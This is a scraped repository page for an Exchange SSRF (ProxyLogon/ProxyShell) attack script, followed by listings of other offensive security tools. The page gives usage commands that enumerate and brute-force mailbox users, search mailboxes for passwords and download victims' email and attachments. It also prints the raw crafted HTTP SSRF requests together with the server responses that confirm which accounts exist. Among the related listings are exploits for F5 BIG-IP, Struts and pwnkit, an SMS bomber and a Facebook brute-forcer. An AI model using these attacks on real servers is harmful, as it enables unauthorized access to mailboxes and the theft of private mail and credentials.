Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Related tags

Security related resourcesExchange_SSRF
Overview

Some Attacks of Exchange SSRF

This project is heavily replicated in ProxyShell, NtlmRelayToEWS

https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag

Get 100 Email Users Without By Brute 无需爆破获取100条邮箱用户

run 运行程序:

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Get

result 结果:

Email Address  : [email protected]
Email Address  : [email protected]
Email Address  : [email protected]
Email Address  : [email protected]

Brute Account 爆破可能存在的用户

file with emails 需要尝试的邮箱文件:

/tmp/emails.txt:

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

run 运行程序:

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Brute --file /tmp/emails.txt

result 结果:

[email protected] valid
[email protected] valid

image-20210817172750895

爆破用户的几个接口 一:

POST /autodiscover/[email protected]/ews/exchange.asmx HTTP/1.1
Host: mail.exchange.com
User-Agent: Python PSRP Client
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Cookie: Email=autodiscover/[email protected]
Content-Length: 776

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <m:GetFolder>
            <m:FolderShape>
                <t:BaseShape>Default</t:BaseShape>
            </m:FolderShape>
            <m:FolderIds>
                <t:DistinguishedFolderId Id="inbox">
                    <t:Mailbox>
                        <t:EmailAddress>[email protected]</t:EmailAddress>
                    </t:Mailbox>
                </t:DistinguishedFolderId>
            </m:FolderIds>
        </m:GetFolder>
    </soap:Body>
</soap:Envelope>

用户存在会提示:

Access is denied. Check credentials and try again.,

爆破用户的几个接口 二:

POST /autodiscover/[email protected]/autodiscover/autodiscover.xml?=&Email=autodiscover/[email protected] HTTP/1.1
Host: mail.exchange.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36.
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 369

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
        <Request>
          <EMailAddress>[email protected]</EMailAddress>
          <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
        </Request>
    </Autodiscover>

用户不存在会提示:

The email address can't be found.

Search Contacts 搜索联系人

run 运行程序:

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action SearchC --email [email protected] --keyword test

--keyword为你想要搜索的联系人关键词。

result 结果:

[email protected]
[email protected]

Search Mails And Download (include attachment) 搜索邮箱并下载,包括附件

run 运行程序:

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action SearchM --email [email protected] --keyword password

--keyword为你想要搜索的关键词,比如"密码"。

result 结果:

[+] Item [output/password-item-0.eml] saved successfully

keyword关键词可以使用一些邮件语法,比如搜索主题时,可以用--keyword "subject:password"

Download user's emails (include attachment) 下载指定用户的邮件,包括附件

run 运行程序:

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Download --email [email protected]

result 结果:

[+] Item [output/item-0.eml] saved successfully

image-20210818142426337

图片

Owner
Jumbo
https://www.chinabaiker.com
Jumbo
GitHub Repository
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.

A simple python script to dump remote files through a local file read or local file inclusion web vulnerability. Features Dump a single file w

Podalirius 48 Dec 03, 2022
Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR

Pushpender Singh 9 Dec 12, 2022
Generate your own NFTs and their metadata based on your desired probabilities.

Generate your own NFTs and their metadata based on your desired probabilities. Use your own art assets too! Perfect for use with Candy Machine.

hex 7 Sep 16, 2022
Fast subdomain scanner, Takes arguments from a Json file ("args.json") and outputs the subdomains.

Fast subdomain scanner, Takes arguments from a Json file ("args.json") and outputs the subdomains. File Structure core/ colors.py db/ wordlist.txt REA

whoami security 4 Jul 02, 2022
Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.

The Recon-ng Framework Recon-ng content now available on Pluralsight! Recon-ng is a full-featured reconnaissance framework designed with the goal of p

2.4k Jan 07, 2023
Writeups for wtf-CTF hosted by Manipal Information Security Team as part of Techweek2021- INCOGNITO

wtf-CTF_Writeups Table of Contents Table of Contents Crypto Misc Reverse Pwn Web Crypto wtf_Bot Author: Madjelly Join the discord server!You know how

6 Jun 07, 2021
BloodyAD is an Active Directory Privilege Escalation Framework

BloodyAD Framework BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combi

757 Jan 07, 2023
CVE-2021-22986 & F5 BIG-IP RCE

Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management

Al1ex 85 Dec 02, 2022
♻️ Password Generator (PSG) 📚 This plugin is made for more familiarity with Python, but can also be used to create passwords

About Tool This plugin is made for more familiarity with Python, but can also be used to create passwords.

STgazing 2 Jul 23, 2022
CVE-2021-45232-RCE-多线程批量漏洞检测

CVE-2021-45232-RCE CVE-2021-45232-RCE-多线程批量漏洞检测 FOFA 查询 title="Apache APISIX Das

孤桜懶契 36 Sep 21, 2022
Automated tool to exploit basic buffer overflow remotely and locally & x32 and x64

Automated tool to exploit basic buffer overflow (remotely or locally) & (x32 or x64)

5 Oct 09, 2022
A Superfast SMS & Call bomber for Linux And Termux !

A Superfast SMS & Call bomber for Linux And Termux !

Anubhav Kashyap 15 Feb 21, 2022
This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data.

Scrambler App This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data. It leverages encryption tools such as

Mystic 2 Aug 31, 2022
A bare-bones POC container runner in python

pybox A proof-of-concept bare-bones container written in 50 lines of python code. Provides namespace isolation and resource limit control Usage Insta

Anirudh Haritas Murali 5 Jun 03, 2021
S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805 Remote code execution S2-062 (CVE-2021-31805) Due to Apache Struts2's incomplete fix for S2-061 (CVE-2020-17530), some tag attributes c

warin9 31 Nov 22, 2022
AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S

صلى الله على محمد وآله 3 Jun 22, 2022
Dapunta Multi Brute Force Facebook - Crack Facebook With Login - Free

✭ DMBF CRACK Dibuat Dengan ❤️ Oleh Dapunta Author: - Dapunta Khurayra X ⇨ Fitur Login [✯] Login Token ⇨ Fitur Crack [✯] Crack Dari Teman, Public,

Dapunta ID 10 Oct 19, 2022
List of S3 Hacks

s3-leaks List of AWS S3 Leaks Feel free to send in a PR if you know of other leaks Date Description Notes Aug2020 S3 bucket mess up exposed 182GB of s

Nag 291 Dec 28, 2022
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

Ashish Kunwar 1 Nov 24, 2022
Python exploit code for CVE-2021-4034 (pwnkit)

Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works

Joe Ammond 92 Dec 29, 2022